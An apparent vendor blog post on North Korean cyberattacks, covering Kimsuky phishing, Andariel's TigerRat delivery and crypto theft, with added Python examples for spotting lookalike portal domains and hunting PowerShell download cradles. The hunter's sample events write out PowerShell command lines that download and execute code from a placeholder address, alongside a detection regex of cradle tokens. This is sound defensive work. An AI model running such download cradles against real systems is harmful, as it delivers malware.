Cybersecurity Challenges and Countermeasures Against North Korean Hacking Attempts
Cybersecurity is growing in importance worldwide. South Korea's National Intelligence Service (NIS) reports an average of 1.5 million attempted cyberattacks per day originating from North Korea. The threat is not confined to the public sector: it extends to defense, diplomatic institutions, and expert networks, and to the portal sites and cloud services that private companies rely on.
In response to North Korea’s evolving cyber threats, effective countermeasures are imperative.
Whereas North Korean hacking groups once operated covertly and kept a low profile, they have recently intensified and broadened their attacks. Traditionally they focused on stealing confidential information or launching Distributed Denial of Service (DDoS) attacks. In recent years they have moved to a wider range of activity, including ransomware, the theft of weapons-related information, and cryptocurrency theft, a shift toward more indiscriminate targeting.
Notably, North Korean hacking groups not only share hacking tools and malware among themselves, they have also shown that they can operate across operating systems, including Linux and macOS. This lets them diversify their targets and raise the sophistication of their campaigns.
Now, let’s delve into specific instances of recent cyberattacks attributed to North Korea.
Recent Cyber Attack Cases
Case #1 North Korean hackers breached a US tech company to steal crypto
In June 2023, Labyrinth Chollima, one of North Korea's most prolific state-backed hacking groups, breached an American IT management company and used it as a springboard to target cryptocurrency companies.
Chainalysis, a blockchain analytics firm, said that North Korean-linked groups stole an estimated $1.7 billion worth of cryptocurrency across multiple hacks in 2022.
North Korea has previously denied organizing digital currency heists, despite voluminous evidence, including U.N. reports, to the contrary.
The intrusion, identified by CrowdStrike, was a supply chain attack: by compromising a vendor whose software or services run inside many other organizations, the attackers gain a path to each of those downstream customers rather than to a single victim.
Case #2 Phishing Attack Targeting 1,400 Individuals
North Korea's hacking group Kimsuky has continued to run phishing campaigns using replica portal sites and malware. In this instance, Kimsuky sent a large-scale phishing email campaign posing as government agencies, media reporters, and research institutes. The emails were made enticing with content matched to the recipient's interests, such as national health insurance notices, interview questions, forum presentation materials, and national tax payment guidelines.
When recipients opened the attached files, they unwittingly installed malware that compromised information on their personal computers. Account credentials were also stolen through phishing sites masquerading as popular portals such as Naver, Daum, and Google.
Kimsuky's phishing emails produced 1,468 victims in total. Of these, 1,411 were ordinary individuals, including office workers and self-employed professionals, and 57 were public officials in the unification and diplomacy fields, including former ministerial-level officials. Although Kimsuky sought diplomatic and security information, no such data was reported to have been compromised.
Law enforcement agencies said that the widening of Kimsuky's targets and the evolution of its methods are tied to a growing interest in virtual assets. The hackers tried to steal cryptocurrency from phishing victims by gaining unauthorized access to their exchange accounts, but these attempts were blocked by the exchanges' security controls. Investigators also found a cryptocurrency mining program running covertly on an attacker-controlled relay server.
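The credential-harvesting half of this campaign relied on hostnames that merely resemble the real portals. A mail gateway or browser extension can catch most of these before a user sees them by judging a link on its registrable domain rather than on whether a familiar name appears somewhere in the URL. The following is an added example, not code from the original article or from any of the organizations named; the brand list, the short public-suffix table, the homoglyph table and the sample links are all constructed assumptions.

```python
"""Flag links whose hostnames impersonate well-known portals.

Added example, not code from the original article. The brand list and the
handful of two-label public suffixes are assumptions sufficient for the sample
URLs; a production version would load the Public Suffix List and the
organization's own allowlist (brand-owned regional domains included).
"""
from urllib.parse import urlparse

PROTECTED_DOMAINS = ("naver.com", "daum.net", "google.com")
TWO_LABEL_SUFFIXES = {"co.kr", "or.kr", "go.kr", "ne.kr", "co.uk", "com.au"}

# Digit-for-letter substitutions common in typosquats (assumed table).
HOMOGLYPHS = str.maketrans({"0": "o", "1": "l", "3": "e", "5": "s", "7": "t"})


def registrable_domain(host: str) -> str:
    """Return the registrable domain (eTLD+1) of a hostname."""
    labels = host.lower().rstrip(".").split(".")
    if len(labels) >= 3 and ".".join(labels[-2:]) in TWO_LABEL_SUFFIXES:
        return ".".join(labels[-3:])
    return ".".join(labels[-2:])


def normalize(text: str) -> str:
    """Undo look-alike substitutions so g00gle compares equal to google."""
    return text.translate(HOMOGLYPHS).replace("rn", "m").replace("vv", "w")


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance; catches one-character typosquats such as navar.com."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def classify_url(url: str) -> str:
    """Return 'legitimate', 'lookalike' or 'unrelated' for one URL.

    Only the registrable domain decides legitimacy: 'naver.com' appearing as
    a subdomain of an attacker-owned domain is a lookalike, not a match.
    """
    host = (urlparse(url).hostname or "").lower()
    if not host:
        return "unrelated"
    reg = registrable_domain(host)
    if reg in PROTECTED_DOMAINS:
        return "legitimate"
    labels = [normalize(label) for label in host.split(".")]
    for brand in PROTECTED_DOMAINS:
        brand_name = brand.split(".")[0]
        # Brand name embedded in any label: www.naver.com.secure-login.xyz, daum-login.kr
        if any(brand_name in label for label in labels):
            return "lookalike"
        # Near-miss spelling of the whole registrable domain: navar.com, g00gle.com
        if edit_distance(normalize(reg), brand) <= 1:
            return "lookalike"
    return "unrelated"


def scan_links(urls):
    """Return the links in a message that should be blocked or sent for review."""
    return [u for u in urls if classify_url(u) == "lookalike"]


SAMPLE_LINKS = [  # constructed for this example, modelled on the campaign above
    "https://nid.naver.com/nidlogin.login",
    "http://www.naver.com.secure-login.xyz/login",
    "http://mail.daum.net.co.kr/",
    "http://navar.com/",
    "http://g00gle.com/account",
    "https://accounts.google.com/signin",
    "https://www.example.org/",
]

if __name__ == "__main__":
    for link in SAMPLE_LINKS:
        print(f"{classify_url(link):10s} {link}")
```

The check refuses to treat naver.com as legitimate unless it is the registrable domain, so www.naver.com.secure-login.xyz is flagged even though the real name appears in full. Brand-owned regional domains and partner domains that contain a brand name will be flagged as well and need an allowlist, and the Public Suffix List should replace the six-entry suffix table in anything beyond a demonstration.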
Case #3 Hacking Domestic Asset Management Program
Recent findings show the North Korean hacking group Andariel distributing malware through a domestic asset management program. The discovery came from logs showing that Andariel's malware had been installed via a specific asset management program used in Korea.
It remains unclear whether the attack exploited a vulnerability in the program or simply abused its legitimate functionality. The investigation did determine, however, that the asset management program running on the targeted system launched a PowerShell command that downloaded the malware *TigerRat.
<*TigerRat is a backdoor with a broad feature set: file upload and download, command execution, basic system information collection, keylogging, screen capture, and port forwarding.>
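The detection opportunity in this case is the parent-child relationship: an asset management agent has no business spawning PowerShell, and a PowerShell command line that downloads and runs remote content has a recognizable shape even when it is base64-encoded. The following is an added example, not code from the article or from any vendor, that applies both checks to process-creation telemetry; the agent binary name AssetAgent.exe, the event fields and the sample events are constructed assumptions, and the 203.0.113.x addresses are documentation-range placeholders.

```python
"""Hunt for PowerShell download cradles launched by a software agent.

Added example, not code from the article or from any vendor. It runs over
process-creation events (Sysmon Event ID 1 / Windows 4688 style fields)
constructed inline. 'AssetAgent.exe' is a placeholder for whatever
asset-management client is deployed, not a real product name, and the
203.0.113.x addresses are documentation-range placeholders.
"""
import base64
import re
from typing import Optional

AGENT_IMAGES = {"assetagent.exe"}  # assumption: binary name of your agent
SHELL_IMAGES = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "mshta.exe"}

# Tokens that appear in nearly every PowerShell download cradle.
CRADLE_RE = re.compile(
    r"Net\.WebClient|DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|\bcurl\b|"
    r"\bwget\b|Start-BitsTransfer|Invoke-Expression|\biex\b|FromBase64String|"
    r"-nop\b|-w(?:indowstyle)?\s+hidden",
    re.IGNORECASE,
)
# -EncodedCommand and its short forms, followed by the base64 payload.
ENCODED_RE = re.compile(r"-e(?:ncodedcommand|nc|c)?\s+([A-Za-z0-9+/=]{20,})", re.IGNORECASE)


def decode_encoded_command(cmdline: str) -> str:
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE), or ''."""
    match = ENCODED_RE.search(cmdline)
    if not match:
        return ""
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""


def analyze_event(event: dict) -> Optional[dict]:
    """Score one process-creation event and return a finding, or None if benign."""
    parent = event.get("ParentImage", "").rsplit("\\", 1)[-1].lower()
    image = event.get("Image", "").rsplit("\\", 1)[-1].lower()
    cmdline = event.get("CommandLine", "")
    reasons = []
    if parent in AGENT_IMAGES and image in SHELL_IMAGES:
        reasons.append(f"{parent} spawned {image}")
    decoded = decode_encoded_command(cmdline)
    if decoded:
        reasons.append("encoded command decoded")
    # Scan both the raw command line and anything recovered from -EncodedCommand.
    tokens = sorted({m.group(0).lower() for m in CRADLE_RE.finditer(cmdline + " " + decoded)})
    if tokens:
        reasons.append("download cradle tokens: " + ", ".join(tokens))
    if not reasons:
        return None
    # The agent spawning a shell *and* a cradle is the pattern from Case #3.
    severity = "high" if len(reasons) >= 2 else "medium"
    return {"host": event.get("Host", "?"), "severity": severity,
            "reasons": reasons, "decoded": decoded}


def hunt(events) -> list:
    """Analyze a batch of events and return findings, high severity first."""
    findings = [f for f in (analyze_event(e) for e in events) if f]
    return sorted(findings, key=lambda f: (f["severity"] != "high", f["host"]))


def _encode(script: str) -> str:
    """Encode a script the way powershell -EncodedCommand expects (test data only)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
AGENT = r"C:\Program Files\AssetAgent\AssetAgent.exe"
SAMPLE_EVENTS = [  # constructed telemetry, not real logs
    {"Host": "PC-01", "ParentImage": AGENT, "Image": PS,
     "CommandLine": "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
                    ".DownloadString('http://203.0.113.10/update.ps1')\""},
    {"Host": "PC-02", "ParentImage": AGENT, "Image": PS,
     "CommandLine": "powershell.exe -enc " + _encode(
         "(New-Object Net.WebClient).DownloadFile('http://203.0.113.10/svc.exe',"
         "'C:\\Users\\Public\\svc.exe')")},
    {"Host": "PC-03", "ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": "powershell.exe Get-ChildItem C:\\Temp"},
    {"Host": "PC-04", "ParentImage": AGENT, "Image": r"C:\Program Files\AssetAgent\inventory.exe",
     "CommandLine": "inventory.exe --scan"},
]

if __name__ == "__main__":
    for finding in hunt(SAMPLE_EVENTS):
        print(finding["severity"].upper(), finding["host"], "; ".join(finding["reasons"]))
```

In a real environment the input would be Sysmon Event ID 1 or Security 4688 records pulled from the SIEM, and AGENT_IMAGES would list the actual client binaries of the deployed asset management product. The severity logic deliberately treats either signal alone as medium and both together as high, mirroring the chain the investigators reconstructed: the agent launched PowerShell, and PowerShell fetched TigerRat.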
North Korean Cyber Attack Trend
Kimsuky and Andariel, the groups most active against South Korean targets, initially focused on stealing security-related information. Their objectives have since broadened to include attacks for financial gain.
In 2022, North Korean hacking groups shifted strategy, targeting the security authentication software installed on individual PCs rather than hacking directly into the networks of public institutions. Compromising software of this kind could give them control of more than 10 million PCs at once.
They have also expanded their tactics to attacks on security products delivered to institutions and to infiltration of the internal networks of major national agencies.
For initial access, North Korean hacking groups favor *spear phishing, *watering hole attacks, and the exploitation of software vulnerabilities. These serve as entry points, and as an attack progresses, further vulnerabilities are exploited to distribute malware.
<*A spear phishing attack is a targeted form of phishing aimed at specific individuals, in contrast to traditional phishing, which is sent indiscriminately to large numbers of recipients.
*A watering hole attack compromises websites the intended victims frequently visit and plants malicious code there, so that the devices of users who open the page are infected.>
North Korea's cyberattacks are expected to intensify ahead of the April 2024 general elections, so individuals, institutions, and businesses should prepare thoroughly according to their own environment.
For individual users:
Exercise caution with email attachments, change your passwords regularly, turn on two-factor authentication or one-time passwords (OTP), and consider blocking logins from overseas IP addresses where the service offers that option.
For corporate security experts:
Monitor asset management programs proactively, remediate vulnerabilities promptly, and develop and maintain comprehensive patch and security policies covering all software, including the operating system and browsers.
For institutions or businesses that cannot staff dedicated security professionals, leveraging managed security solutions provided by experts, such as Cloudbric WAF+, can be a prudent approach. Cloudbric WAF+ is a comprehensive, fully managed cloud Security-as-a-Service (SaaS) platform that delivers cloud-based managed web application and API security services.
To prepare for increasingly sophisticated cyberattacks from North Korea, it is essential to study the various hacking cases as they emerge. Beyond that, establishing a security policy and response system tailored to the institution or business environment is imperative.